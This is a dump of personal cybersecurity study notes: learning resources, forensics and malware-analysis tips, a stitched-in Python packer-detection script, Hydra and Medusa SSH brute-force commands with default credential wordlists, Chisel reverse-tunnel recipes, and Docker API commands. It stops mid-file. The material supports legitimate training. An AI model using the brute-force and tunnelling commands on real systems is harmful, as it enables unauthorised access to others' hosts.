```
├── Cybersecurity Learning Resources.md
├── F500
│   ├── Cheatsheets
│   │   ├── 13cubed.pdf
│   │   ├── markdown.md
│   │   └── sans.pdf
│   ├── Day 1.md
│   └── Day 2.md
├── F610
│   ├── 1. Tools.md
│   ├── 2. Static Properties Analysis.md
│   ├── 3. Behavioral Analysis.md
│   ├── 4. Static Code Analysis.md
│   ├── 5. Maldoc Analysis.md
│   ├── 6. Unpacking Malware.md
│   ├── 7. Code Injections.md
│   └── 8. Anti-debugging.md
├── Gray Hat Hacking
│   └── 1. Preparation.md
├── Hardware
│   └── Digispark.md
├── I want to learn.md
├── Misc
│   ├── Android Shell Commands.md
│   ├── Auth Bruteforcing.md
│   ├── CIA - Vault7.md
│   ├── Chisel.md
│   ├── Container Security.md
│   ├── Cracking Hashes.md
│   ├── Custom Wordlists.md
│   ├── File Transfers.md
│   ├── Firewall Evasion.md
│   ├── Recon.md
│   ├── SSH Forward Connections.md
│   ├── SSH Remote Connections.md
│   ├── Socat.md
│   └── Wireless Security.md
├── P300
│   ├── 1. Client Side Code Execution With Office.md
│   └── 2. Client Side Code Execution With Windows Script Host.md
├── Pasted image 20220801123813.png
├── Pentesting Active Directory
│   ├── 0. Active Directory 101.md
│   ├── Active Directory Enumeration.md
│   ├── Active Directory.md
│   └── Breaching Active Directory.md
├── Pentesting Linux Hosts
│   ├── Linux Persistence Backdoors.md
│   ├── Linux Post-Exploitation.md
│   ├── Linux Privilege Escalation.md
│   └── Linux Reverse Shells.md
├── Pentesting Windows Hosts
│   ├── Windows Code Execution to Shell.md
│   ├── Windows Post-Exploitation.md
│   └── Windows Privilege Escalation.md
├── Ports
│   ├── 111 NFS.md
│   ├── 135 RPC.md
│   ├── 1433 MSSQL.md
│   ├── 161 SNMP.md
│   ├── 2049 NFS.md
│   ├── 21 FTP.md
│   ├── 25 SMTP.md
│   ├── 3306 MYSQL.md
│   ├── 3389 RDP.md
│   ├── 389 LDAP.md
│   ├── 445 SMB.md
│   ├── 53 DNS.md
│   ├── 5985 PS Remoting.md
│   ├── 80 HTTP.md
│   └── 88 Kerberos.md
├── RTO
│   ├── API Hashing.md
│   ├── Antivirus Evasion.md
│   ├── Dropper.md
│   ├── Function Call Obfuscation.md
│   ├── GuidedHacking Videos.md
│   ├── Hooks Removal and Bypass.md
│   ├── Removing CRT.md
│   ├── Shellcode Injection.md
│   ├── Shellcode Obfuscation.md
│   └── Shellcode POC.md
└── Web Security
    ├── File Inclusions.md
    ├── JWT.md
    ├── Log4j.md
    ├── SQL Injections.md
    ├── Server Side Request Forgery.md
    └── Server-side Template Injections.md
```

--------------------------------------------------------------------------------
/Cybersecurity Learning Resources.md:
--------------------------------------------------------------------------------

# Cybersecurity Learning Services

| Description | Link |
| --- | --- |
| Linux/Bash tutorials | https://cmdchallenge.com/ |
| Pentesting, CTF challenges | https://app.hackthebox.com/ |
| Everything security related | https://tryhackme.com/ |
| Single machine pentesting | https://portal.offensive-security.com/labs/play |
| Digital Forensics and Incident Response | https://blueteamlabs.online/home |
| Digital Forensics and Incident Response | https://cyberdefenders.org/blueteam-ctf-challenges/ |
| Web Security | https://portswigger.net/web-security |
| Cross Site Scripting | https://alf.nu/alert1 |
| Web, API, AWS and Front-End security | https://application.security/ |
| Cryptography | https://cryptohack.org/ |
| Binary Exploitation | https://pwn.college/ |

# Pentesting Labs

| Price (EUR) | Machines | Organization | Name | Link |
| --- | --- | --- | --- | --- |
| 0 | 2 | eLearnSecurity | Black-box Penetration Test 1 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/a8e27b29-5c64-43c3-9643-41026ecc895a) |
| 0 | 2 | eLearnSecurity | Black-box Penetration Test 2 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/6f6dd176-54f6-442f-968a-ada7454ff9fa) |
| 10/month | 2 | Hack the Box | P.O.O. | [link](https://app.hackthebox.com/endgames/poo) |
| 0 | 3 | eLearnSecurity | Black-box Penetration Test 3 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/077b45bc-9eaa-4c2e-bcb3-a949a89b95fa) |
| 0 | 3 | TryHackMe | Wreath | [link](https://tryhackme.com/room/wreath) |
| 10/month | 3 | Hack the Box | Hades | [link](https://app.hackthebox.com/endgames/hades) |
| 10/month | 4 | Hack the Box | RPG | [link](https://app.hackthebox.com/endgames/rpg) |
| 10/month | 6 | Hack the Box | Xen | [link](https://app.hackthebox.com/endgames/xen) |
| 10/month | 6 | TryHackMe | Holo | [link](https://tryhackme.com/room/hololive) |
| 60/month | 11 | TryHackMe | Throwback | [link](https://tryhackme.com/network/throwback) |
| 80+20/month | 14 | Hack the Box | Dante | [link](https://app.hackthebox.com/prolabs/overview/dante) |
| 80+20/month | 15 | Hack the Box | RastaLabs | [link](https://app.hackthebox.com/prolabs/overview/rastalabs) |
| 80+20/month | 18 | Hack the Box | APTLabs | [link](https://app.hackthebox.com/prolabs/overview/aptlabs) |
| 80+20/month | 21 | Hack the Box | Offshore | [link](https://app.hackthebox.com/prolabs/overview/offshore) |
| 80+20/month | 28 | Hack the Box | Cybernetics | [link](https://app.hackthebox.com/prolabs/overview/cybernetics) |
| 149 | ? | Pentester Academy | Attacking Active Directory with Linux Lab | [link](https://www.pentesteracademy.com/linuxad) |
| 250 | ? | Pentester Academy | Attacking and Defending Active Directory Lab | [link](https://www.pentesteracademy.com/activedirectorylab) |
| 299 | ? | Pentester Academy | Red Team Lab | [link](https://www.pentesteracademy.com/redteamlab) |
| 339 | ? | Pentester Academy | Global Central Bank: An Enterprise Cyber Range | [link](https://www.pentesteracademy.com/gcb) |
| 470 | ? | Zero Point Security | Red Team Ops | [link](https://training.zeropointsecurity.co.uk/courses/red-team-ops) |

# Courses

## Malware Development
- Zero Point Security - [C2 Development in C#](https://training.zeropointsecurity.co.uk/courses/c2-development-in-csharp) (~60€)
- Zero Point Security - [Offensive Driver Development](https://training.zeropointsecurity.co.uk/courses/offensive-driver-development) (~60€)
- Sektor7 - [RED TEAM Operator: Malware Development Essentials](https://institute.sektor7.net/red-team-operator-malware-development-essentials) (~200€)
- Sektor7 - [RED TEAM Operator: Malware Development Intermediate](https://institute.sektor7.net/rto-maldev-intermediate) (~220€)
- Sektor7 - [RED TEAM Operator: Windows Evasion](https://institute.sektor7.net/rto-win-evasion) (~230€)
- Sektor7 - [RED TEAM Operator: Windows Persistence](https://institute.sektor7.net/rto-windows-persistence) (~230€)
- Sektor7 - [RED TEAM Operator: Privilege Escalation in Windows](https://institute.sektor7.net/rto-lpe-windows) (~220€)
- Offensive Security - [PEN-300](https://www.offensive-security.com/pen300-osep/) (~1500€)
- Dark Vortex - [Malware On Steroids](https://0xdarkvortex.dev/training-programs/malware-on-steroids/) (~2000€)
- Dark Vortex - [Offensive Tool Development](https://0xdarkvortex.dev/training-programs/offensive-tool-development/) (~2000€)

## Malware Analysis
- Neil Fox - [Noob2Ninja](https://www.youtube.com/playlist?list=PLiFO-R_BI-kAqDPqtnOq2n70mtAZ6xg5N) (FREE)
- @0verfl0w_ - [The Beginner Malware Analysis Course](https://www.0ffset.net/training/beginner-malanalysis/) (~45€)
- @0verfl0w_ - [Zero2Automated](https://courses.zero2auto.com/adv-malware-analysis-course) (~175€)
- SANS - [FOR610](https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/) (~7500€ ...no, that's not a typo)
- SANS - [FOR710](https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/) (~7500€ ...no, that's also not a typo)

--------------------------------------------------------------------------------
/F500/Cheatsheets/13cubed.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/F500/Cheatsheets/13cubed.pdf

--------------------------------------------------------------------------------
/F500/Cheatsheets/sans.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/F500/Cheatsheets/sans.pdf

--------------------------------------------------------------------------------
/F500/Day 1.md:
--------------------------------------------------------------------------------

https://www.magnetforensics.com/resource-search-results/?category=free-tool

# RAM Image Acquisition
## Live
- DumpIt
- FTK Imager
- Magnet Forensics RamCapture
- Belkasoft Live RAM Capturer
## Dead
- %SystemDrive%/hiberfil.sys
- %SystemDrive%/pagefile.sys
- %WINDIR%/MEMORY.DMP

# Checking for Encryption
- EDD.exe

# Disk Image Acquisition
Artifacts to collect: Registry Hives and Backups, LNK Files, Jump Lists, Prefetch, Event Logs and PnP Logs, Browser Data, Recycle Bin, Master File Table, NTFS Log File and Journal Log, Pagefile and Hibernation Files.

```
./CyLR.exe -c CONFIG
```

# Mounting Disk Images
- FTK Imager
- Arsenal Image Mounter

# Data Stream Carving
- Internet Evidence Finder
- Axiom

# File Carving
- PhotoRec ([link](https://www.cgsecurity.org/wiki/TestDisk_Download))
- PhotoRec_Sorter

--------------------------------------------------------------------------------
/F500/Day 2.md:
--------------------------------------------------------------------------------

# Location of Registry Hives
%WinDir%/System32/Config
- SAM
- SECURITY
- SYSTEM
- SOFTWARE
- DEFAULT

%WinDir%/appcompat/Programs/AMCACHE.hve

%WinDir%/System32/Config/RegBack
- SAM
- SECURITY
- SYSTEM
- SOFTWARE
- DEFAULT

%UserProfile%/NTUSER.DAT

%UserProfile%/AppData/Local/Microsoft/Windows/USRCLASS.DAT

# Viewing Registry Hives
- Registry Explorer.exe ([link](https://ericzimmerman.github.io/#!index.md))
- cafae.exe ([link](https://tzworks.com/prototype_page.php?proto_id=19))
- RegEdit.exe

| Location | Info |
| --- | --- |
| SOFTWARE/Microsoft/Windows NT/CurrentVersion | OS Version |
| SYSTEM/Select | CurrentControlSet |
| SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName | Computer Name |
| SYSTEM/CurrentControlSet/Control/TimeZoneInformation | Time Zone |
| SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/Interfaces | Network Interfaces |
| SYSTEM/CurrentControlSet/Services/lanmanserver/Shares | Shares |

--------------------------------------------------------------------------------
/F610/1. Tools.md:
--------------------------------------------------------------------------------

# Analysis Tools
Static properties analysis:
- PeStudio
- CFF Explorer
- peframe
- Detect It Easy
- ImHex

Behavioral analysis:
- Process Hacker 2
- Process Monitor
- RegShot
- Wireshark
- fakedns
- INetSim

Code analysis:
- Ghidra
- x32dbg/x64dbg
- OllyDumpEx
- runsc
- Scylla

# Online Tools
Malware repositories:
- https://github.com/ytisf/theZoo
- https://samples.vx-underground.org/samples/Families/
- https://zeltser.com/malware-sample-sources/
- https://malware-traffic-analysis.net/

Multi-engine scanners:
- VirusTotal
- MetaDefender
- VirSCAN
- AVCaesar

File reputation:
- Malware Hash Registry
- HashSets
- Winbindex

Automated sandboxes:
- Any.run
- CAPE
- Intezer Analyze
- Hybrid Analysis

Website investigation:
- urlQuery
- vURL
- Quttera
- urlscan.io

--------------------------------------------------------------------------------
/F610/2. Static Properties Analysis.md:
--------------------------------------------------------------------------------

Gathering basic file properties:
- file and section hashes
- packer identification
- embedded resources
- imports and exports
- crypto references
- digital certificates
- interesting strings

# Hashes
```
sha256sum.exe FILE
md5sum.exe FILE
```
Look the hash up: https://virustotal.com/gui/search/HASH

# Strings
On Linux:
```bash
$ floss FILE
$ pestr FILE
$ xorsearch FILE 'QUERY'   # query for example 'http'
$ strings -a FILE
$ strings --encoding=l FILE
```

On Windows:
```powershell
> floss FILE
```

# Capa
```bash
$ capa FILE
$ capa -vv FILE
```

# File properties
PeStudio (Windows) / peframe (Linux)

# File creation info
Detect It Easy (Windows) / Exeinfo PE (Windows) / diec (Linux)

--------------------------------------------------------------------------------
/F610/3. Behavioral Analysis.md:
--------------------------------------------------------------------------------

# Process Hacker
Just runs in the background.

# Process Monitor
Filter > Process Name is FILENAME
Process Tree > explorer.exe > children
File > Save > All events > Comma-Separated Values > ProcDOT > Procmon [...] > Launcher [...] > Refresh

# Regshot
First snapshot before detonation, second snapshot after detonation.

# INetSim
logs: `/var/log/inetsim`
files: `/var/lib/inetsim`
configuration: `/etc/inetsim/inetsim.conf`
```
start_service dns
service_bind_address 0.0.0.0
dns_default_ip LHOST
```

# Wireshark
```
ip.addr / ip.src / ip.dst == IP
tcp.port == PORT

http or dns
http.request
http.response.code == CODE

!(arp or dns or icmp)
tcp.analysis.flags
tcp.flags.syn / tcp.flags.reset == 1
```

# Redirect traffic going to any IP
On REMnux:
```
accept-all-ips start
accept-all-ips stop
```

Using iptables:
```
iptables -t nat -A PREROUTING -i eth0 -j REDIRECT
iptables -t nat -D PREROUTING -i eth0 -j REDIRECT
```

# Debuggers
x32dbg/x64dbg

```
bp CreateProcessW
bp CreateProcessA
bp LoadLibraryA
bp GetProcAddress
```

--------------------------------------------------------------------------------
/F610/4. Static Code Analysis.md:
--------------------------------------------------------------------------------

# Top 15 opcodes

| Instructions | Function |
| --- | --- |
| mov push pop lea | Moving data |
| add sub xor and | Manipulating data |
| cmp test | Comparing data |
| call retn jmp jz jnz | Changing execution path |

All the jumps explained: http://unixwiz.net/techtips/x86-jumps.html

# Ghidra
Analysis options > WindowsPE x86 Propagate External Parameters
Window > Symbol References > Filter
Window > Function Call Trees

Window layout:

| Monitor 1 | Monitor 2 | Monitor 3 |
| --- | --- | --- |
| Symbol References/Function Call Trees | Listing/Decompile | Web Browser/Notes |

Interesting library functions:
- ShellExecute?
- CreateProcess?
- LoadLibrary?
- GetProcAddress
- ?clipboard?
- ?keystate?
- ?window?

--------------------------------------------------------------------------------
/F610/5. Maldoc Analysis.md:
--------------------------------------------------------------------------------

# .PDF
Risky keywords:

| Keyword | Function |
| --- | --- |
| /JS /JavaScript /AcroForm /XFA | Executing JS |
| /Launch /EmbeddedFile | Launching programs |
| /OpenAction /AA | Take action when the PDF is opened |
| /URI /SubmitForm | Interaction with websites |

```bash
$ pdfid.py FILE -n
$ pdf-parser.py FILE -a
$ pdf-parser.py FILE -s KEYWORD
$ pdf-parser.py FILE -k KEYWORD
$ pdf-parser.py FILE -o OBJECT_ID
$ pdf-parser.py FILE -o OBJECT_ID -d DUMP_FILENAME
$ pdf-parser.py FILE -r REFERENCED_OBJECT_ID
```

# .DOC
```bash
$ zipdump.py FILE
$ zipdump.py FILE -s INDEX -d > FILENAME

$ oleid FILE

$ olevba FILE

$ oledump.py -i FILE
$ oledump.py -s a -v FILE

$ pcode2code INFILE > OUTFILE

$ evilclippy -uu FILE
```

Add this to Auto_Open/Document_Open to start the debugger:
```
Debug.Assert False
```

# .JS
```bash
$ js-beautify FILE
$ js -f FILE
$ js -f /usr/share/remnux/objects.js FILE
```

Suspicious keywords:
- eval
- callee

To debug evals we can add this snippet to the top of the file (it prints every string before it is evaluated and still returns the result, so nested evals keep working):
```js
var orig_eval = eval;
eval = function (input_string) {
    WScript.Echo(input_string);        // show the decoded stage before it runs
    return orig_eval(input_string);    // keep the original return value
};
```

--------------------------------------------------------------------------------
/F610/6. Unpacking Malware.md:
--------------------------------------------------------------------------------

# Detection
Use 'Detect It Easy', 'ExeInfo PE' or 'PEiD' to check for common packers.
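As an added example (not code from these notes or from the tools named above), a small Python triage script that applies two of the heuristics those packer detectors rely on: known packer section names and per-section Shannon entropy. It walks the PE section table with `struct` only; the packer name list is an assumption, and the sample files are constructed in the block as header-only PEs that are not loadable.

```python
"""Packer triage heuristics for PE files (added example, not part of the original notes)."""
import hashlib
import math
import struct
import sys

# Section names left behind by common packers. Assumed, non-exhaustive list.
PACKER_SECTION_NAMES = {
    "UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".nsp0", ".nsp1",
    ".petite", ".themida", ".vmp0", ".vmp1", ".MPRESS1", ".MPRESS2",
}
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of data in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk the PE headers with struct only; return [(name, virtual_size, raw_bytes)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        name = name.rstrip(b"\0").decode("latin-1")
        sections.append((name, vsize, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(pe: bytes):
    """Return human-readable indicators that the file is packed (empty list if none)."""
    findings = []
    for name, vsize, raw in parse_sections(pe):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name}: known packer section name")
        if vsize and not raw:
            # Typical UPX layout: an empty section reserved for the unpacked image.
            findings.append(f"{name}: no raw data but {vsize:#x} bytes virtual size (unpacking target)")
        entropy = shannon_entropy(raw)
        if entropy >= HIGH_ENTROPY:
            findings.append(f"{name}: entropy {entropy:.2f} bits/byte")
    return findings


def build_minimal_pe(sections):
    """Constructed fixture: header-only PE with the given (name, vsize, raw) sections. Not loadable."""
    e_lfanew, opt_size = 0x40, 224
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)   # raw data follows the headers
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    table, body = b"", b""
    for name, vsize, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(raw)
        body += raw
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + body


# Constructed samples: a UPX-style layout (empty UPX0, high-entropy UPX1) and a plain one.
PSEUDO_RANDOM = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
PACKED_SAMPLE = build_minimal_pe([("UPX0", 0x8000, b""), ("UPX1", 0x3000, PSEUDO_RANDOM),
                                  (".rsrc", 0x200, b"\0" * 512)])
CLEAN_SAMPLE = build_minimal_pe([(".text", 0x1000, b"Hello, world! " * 300),
                                 (".data", 0x100, b"\0" * 256)])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else PACKED_SAMPLE
    print("\n".join(packer_indicators(data)) or "no packer indicators")
```

Run it against a real file with `python3 packer_triage.py SAMPLE.exe`; with no argument it reports on the constructed UPX-style sample.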
3 | 4 | Online service for unpacking: 5 | https://www.unpac.me/ 6 | https://www.youtube.com/watch?v=FctDptnYukQ 7 | 8 | # Using debugger to unpack aditional stages 9 | bp VirtualAllocEx 10 | 11 | x??dbg > Plugins > OllyDumpEx > Dump the Process > Get RIP as OEP > Dump > Plugins > Scylla > IAT Autosearch > Get Imports > Fix Dump 12 | 13 | -------------------------------------------------------------------------------- /F610/7. Code Injections.md: -------------------------------------------------------------------------------- 1 | # Windows APIs to watch out for 2 | - GetModuleHandle 3 | - LoadLibraryW 4 | - GetProcAddress 5 | 6 | - CreateToolhelp32Snapshot 7 | - OpenProcess 8 | 9 | - VirtualAllocEx 10 | - WriteProcessMemory 11 | - VirtualProtectEx 12 | - CreateRemoteThread -------------------------------------------------------------------------------- /F610/8. Anti-debugging.md: -------------------------------------------------------------------------------- 1 | # TLDR 2 | bp IsDebuggerPresent 3 | bp OutputDebugString 4 | bp CheckRemoteDebuggerPresent 5 | bp NtQueryInformationProcess 6 | bp ZwQueryInformationProcess 7 | bp GetTickCount 8 | bp GetLocalTime 9 | bp GetSystemTime 10 | 11 | Checking BeingDebugged field in the PEB: 12 | ``` 13 | mov eax, fs:[30h] 14 | mov eax, [eax+2] 15 | test eax, eax 16 | ``` 17 | 18 | Checking NtGlobalFlag field in the PEB: 19 | ``` 20 | mov eax, dword ptr fs:[30] 21 | test byte ptr ds:[eax+68], 70 ; 32-bit 22 | test byte ptr ds:[eax+bc], 70 ; 64-bit 23 | ``` 24 | 25 | Checking if the program is executing slowly: 26 | ```c 27 | if ( ( GetTickCount() - lStartTime ) > 5000 ) { 28 | exit(1); 29 | } 30 | ``` 31 | 32 | GetTickCount alternatives: GetLocalTime, GetSystemTime, RDTSC instruction. 33 | 34 | -------------------------------------------------------------------------------- /Gray Hat Hacking/1. 
Preparation.md: -------------------------------------------------------------------------------- 1 | # Binary, Dynamic Information-Gathering Tools 2 | ```bash 3 | ldd FILE 4 | objdump -R FILE 5 | strings -tx FILE 6 | 7 | strace FILE 8 | strace -e trace=SYSCALL FILE 9 | ltrace FILE 10 | 11 | checksec --file=FILE 12 | 13 | one_gadget ... 14 | ropper ... 15 | ``` -------------------------------------------------------------------------------- /Hardware/Digispark.md: -------------------------------------------------------------------------------- 1 | # preferences > aditional boards manager urls: 2 | http://digistump.com/package_digistump_index.json 3 | 4 | # tools > board > board manager 5 | digistump avr boards 6 | 7 | # install micronucleus 8 | yay -S micronucleus 9 | 10 | # add user to 'uucp' group 11 | 12 | # locate installed micronucleus 13 | locate micronucleus 14 | 15 | # override old micronucleus with newly installed 16 | cp NEWPATH ~/.arduino15/packages/digistump/tools/micronucleus/2.0a4/micronucleus 17 | -------------------------------------------------------------------------------- /I want to learn.md: -------------------------------------------------------------------------------- 1 | # I want to learn ... 2 | 3 | ## ... basics: 4 | - https://cmdchallenge.com/ 5 | - https://overthewire.org/wargames/bandit/ 6 | - https://app.hackthebox.com/starting-point 7 | 8 | ## ... web security: 9 | - https://portswigger.net/web-security/learning-path 10 | - https://www.hacksplaining.com/lessons 11 | - https://alf.nu/alert1 12 | 13 | ## ... penetration testing: 14 | - https://app.hackthebox.com/machines/list/active 15 | - https://www.youtube.com/c/ippsec 16 | - https://portal.offensive-security.com/labs/play 17 | 18 | ## ... digital forensic & incident response: 19 | - https://cyberdefenders.org/blueteam-ctf-challenges/ 20 | - https://blueteamlabs.online/home/challenges 21 | - https://letsdefend.io/ 22 | - https://www.youtube.com/c/13cubed 23 | 24 | ## ... 
malware analysis: 25 | - https://www.youtube.com/playlist?list=PLiFO-R_BI-kAqDPqtnOq2n70mtAZ6xg5N 26 | - https://forum.tuts4you.com/files/categories/ 27 | - https://www.youtube.com/c/OALabs 28 | - https://www.youtube.com/c/MalwareAnalysisForHedgehogs 29 | 30 | ## ... malware development: 31 | - https://shogunlab.gitbook.io/building-c2-implants-in-cpp-a-primer/ 32 | - https://www.youtube.com/watch?v=TfG9lBYCOq8 33 | - https://www.vx-underground.org/windows.html 34 | 35 | ## ... game hacking: 36 | - https://www.youtube.com/c/GuidedHacking 37 | - https://www.youtube.com/c/NullTerminator 38 | 39 | ## ... binary exploitation: 40 | - https://pwn.college/ 41 | - https://guyinatuxedo.github.io/index.html 42 | - https://www.youtube.com/channel/UCksdNO8hAiOQoWZhEXhyyZA 43 | 44 | ## ... cryptography: 45 | - https://cryptohack.org/challenges/ 46 | - https://cryptopals.com/ 47 | -------------------------------------------------------------------------------- /Misc/Android Shell Commands.md: -------------------------------------------------------------------------------- 1 | ## Downloading APKs 2 | adb shell pm list packages 3 | adb shell pm path PACKAGE 4 | adb pull APKPATH DESTINATION 5 | 6 | ## Misc 7 | adb shell settings put global http_proxy LHOST:LPORT 8 | adb install APK -------------------------------------------------------------------------------- /Misc/Auth Bruteforcing.md: -------------------------------------------------------------------------------- 1 | # Authentication bruteforcing 2 | 3 | ## Medusa 4 | 5 | ```bash 6 | medusa -h RHOST -M ssh -U PASSWORDS -P USERNAMES 7 | ``` 8 | 9 | ## Hydra 10 | 11 | ```bash 12 | hydra -L USERNAMES -P PASSWORDS SSH://TARGET -T 64 13 | ``` 14 | 15 | ## Default credentials 16 | 17 | SecLists/Usernames/top-usernames-shortlist.txt 18 | ``` 19 | root 20 | admin 21 | test 22 | guest 23 | info 24 | adm 25 | mysql 26 | user 27 | administrator 28 | oracle 29 | ftp 30 | pi 31 | puppet 32 | ansible 33 | ec2-user 34 | vagrant 35 | azureuser 
36 | ``` 37 | 38 | SecLists/Passwords/darkweb2017-top100.txt 39 | ``` 40 | 123456 41 | 123456789 42 | 111111 43 | password 44 | qwerty 45 | abc123 46 | 12345678 47 | password1 48 | 1234567 49 | 123123 50 | 1234567890 51 | 000000 52 | 12345 53 | iloveyou 54 | 1q2w3e4r5t 55 | 1234 56 | 123456a 57 | qwertyuiop 58 | monkey 59 | 123321 60 | dragon 61 | 654321 62 | 666666 63 | 123 64 | myspace1 65 | a123456 66 | 121212 67 | 1qaz2wsx 68 | 123qwe 69 | 123abc 70 | tinkle 71 | target123 72 | gwerty 73 | 1g2w3e4r 74 | gwerty123 75 | zag12wsx 76 | 7777777 77 | qwerty1 78 | 1q2w3e4r 79 | 987654321 80 | 222222 81 | qwe123 82 | qwerty123 83 | zxcvbnm 84 | 555555 85 | 112233 86 | fuckyou 87 | asdfghjkl 88 | 12345a 89 | 123123123 90 | 1q2w3e 91 | qazwsx 92 | computer 93 | aaaaaa 94 | 159753 95 | iloveyou1 96 | fuckyou1 97 | princess 98 | 789456123 99 | 11111111 100 | 123654 101 | princess1 102 | 888888 103 | linkedin 104 | michael 105 | sunshine 106 | football 107 | 11111 108 | 777777 109 | 1234qwer 110 | 999999 111 | j38ifUbn 112 | monkey1 113 | football1 114 | daniel 115 | azerty 116 | a12345 117 | 123456789a 118 | 789456 119 | asdfgh 120 | love123 121 | abcd1234 122 | jordan23 123 | 88888888 124 | 5201314 125 | 12qwaszx 126 | FQRG7CS493 127 | ashley 128 | asdf 129 | asd123 130 | superman 131 | jessica 132 | love 133 | samsung 134 | shadow 135 | blink182 136 | 333333 137 | michael1 138 | babygirl1 139 | ``` 140 | -------------------------------------------------------------------------------- /Misc/CIA - Vault7.md: -------------------------------------------------------------------------------- 1 | Malware development DOs and DON'Ts 2 | https://wikileaks.org/ciav7p1/cms/page_14587109.html 3 | 4 | Using cryptography 5 | https://wikileaks.org/ciav7p1/cms/files/NOD%20Cryptographic%20Requirements%20v1.1%20TOP%20SECRET.pdf 6 | 7 | In-memory Code Execution 8 | https://wikileaks.org/ciav7p1/cms/files/ICE-Spec-v3-final-SECRET.pdf 9 | 10 | Persisted DLL 11 | 
https://wikileaks.org/ciav7p1/cms/files/Persisted-DLL-Spec-v2-SECRET.pdf 12 | -------------------------------------------------------------------------------- /Misc/Chisel.md: -------------------------------------------------------------------------------- 1 | # chisel 2 | 3 | [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) 4 | 5 | ## Local Port Forward 6 | 7 | Proxy host: 8 | ``` 9 | ./chisel server -p LPORT 10 | ``` 11 | 12 | Attacker host: 13 | ``` 14 | ./chisel client RHOST:RPORT LPORT:RHOST:RPORT 15 | ``` 16 | 17 | ## Remote Port Forward 18 | 19 | Attacker host: 20 | ``` 21 | ./chisel server -p LPORT --reverse & 22 | ``` 23 | 24 | Proxy host: 25 | ``` 26 | ./chisel client RHOST:RHOST R:LPORT:RHOST:RHOST & 27 | ``` 28 | 29 | ## Reverse SOCKS Proxy 30 | 31 | On attacker host: 32 | ``` 33 | ./chisel server -p LPORT --reverse & 34 | ``` 35 | 36 | On proxy host: 37 | ``` 38 | ./chisel client RHOST:RPORT R:socks & 39 | ``` 40 | 41 | Then use proxychains. 42 | 43 | ## Forward SOCKS Proxy 44 | 45 | On proxy host: 46 | ``` 47 | ./chisel server -p LPORT --socks5 48 | ``` 49 | 50 | On attacker host: 51 | ``` 52 | ./chisel client RHOST:RPORT LPORT:socks 53 | ``` 54 | 55 | Then use proxychains. 
56 | -------------------------------------------------------------------------------- /Misc/Container Security.md: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=0hrv0qyOEd0 2 | https://bootcamps.pentesteracademy.com/course/container-security-on-demand 3 | 4 | ## Docker Commands 5 | ```bash 6 | docker info 7 | docker pull IMAGE:TAG 8 | docker images / docker image ls 9 | 10 | docker run -dt IMAGE # detached 11 | docker run -it IMAGE # interactive 12 | 13 | docker ps / docker container ls 14 | 15 | docker inspect ID/NAME 16 | docker attach ID/NAME 17 | docker exec -dt ID/NAME COMMAND 18 | docker exec -it ID/NAME COMMAND 19 | 20 | docker stop ID/NAME 21 | docker start ID/NAME 22 | docker kill ID/NAME 23 | 24 | docker container ... 25 | docker image ... 26 | docker network ... 27 | ``` 28 | --- 29 | ## Dockerfile 30 | ```Dockerfile 31 | FROM alpine 32 | 33 | COPY script.sh /root/ 34 | 35 | run chmod +x /root/script 36 | ``` 37 | 38 | ```bash 39 | docker build -t IMAGE . 40 | ``` 41 | --- 42 | ## docker-compose.yaml 43 | ```yaml 44 | version: "3.5" 45 | services: 46 | appserver: 47 | image: IMAGE 48 | networks: 49 | - backend 50 | memcache: 51 | image: IMAGE 52 | networks: 53 | - backend 54 | networks: 55 | backend: 56 | name: test-net 57 | driver: bridge 58 | ``` 59 | 60 | ```bash 61 | docker-compose up 62 | ``` 63 | --- 64 | ## Docker API without Docker client 65 | When you don't have docker client installed you can use http api/unix socket. 66 | ```bash 67 | curl http://localhost:2375/images/json 68 | curl --unix-socket /var/run/docker.sock http://localhost/images/json 69 | 70 | curl http://HOST/v2/_catalog 71 | curl http://HOST/v2/REPO/tags/list 72 | curl http://HOST/v2/REPO/manifests/TAG 73 | curl -s http://HOST/v2/REPO/blobs/sha256:SHASUM --output layer1.tar 74 | 